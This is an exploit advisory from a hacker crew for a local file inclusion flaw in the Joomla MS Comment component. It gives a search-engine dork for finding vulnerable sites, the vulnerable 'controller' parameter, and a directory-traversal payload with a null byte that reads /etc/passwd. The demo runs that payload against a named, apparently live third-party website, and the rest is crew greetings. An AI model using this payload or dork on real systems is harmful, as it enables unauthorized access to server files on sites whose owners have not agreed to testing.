[!]===========================================================================[!] [~] Joomla Component MS Comment LFI Vulnerability [~] Author : Xr0b0t (nyco.danis@gmail.com) [~] Homepage : http://www.indonesiancoder.com | http://Xr0b0t.name | http://Malangcyber.com [~] Date : 16 Mei, 2010 [!]===========================================================================[!] [ Software Information ] [+] Vendor : http://www.m0r0n.com/ [+] Price : free [+] Vulnerability : LFI [+] Dork : inurl:"com_mscomment" ;) [+] Version : 0.8.0b maybe lower also affected [!]===========================================================================[!] [ Vulnerable File ] http://127.0.0.1/index.php?option=com_mscomment&controller=[INDONESIANCODER] [ XpL ] ../../../../../../../../../../../../../../../etc/passwd%00 [ d3m0 ] http://www.paparazza.com.br/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 etc etc etc ;] [!]===========================================================================[!] [ Thx TO ] [+] kaMtiEz dulurku seng paling ganteng, endi kok ra rene [+] INDONESIAN CODER TEAM IndonesianHacker Malang CYber CREW Magelang Cyber [+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,bobyhikaru,gonzhack,senot [+] Contrex,YadoY666,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck,Geni212 [+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,Yur4kha [ NOTE ] [+] OJOK JOTOS2an YO .. [+] Minggir semua Arumbia Team Mau LEwat ;) [+] MBEM : lup u :"> [ QUOTE ] [+] INDONESIANCODER still r0x... [+] ARUmBIA TEam Was Here Cuy MINGIR Kabeh KAte lewat .. [+] Malang Cyber Crew & Magelang Cyber Community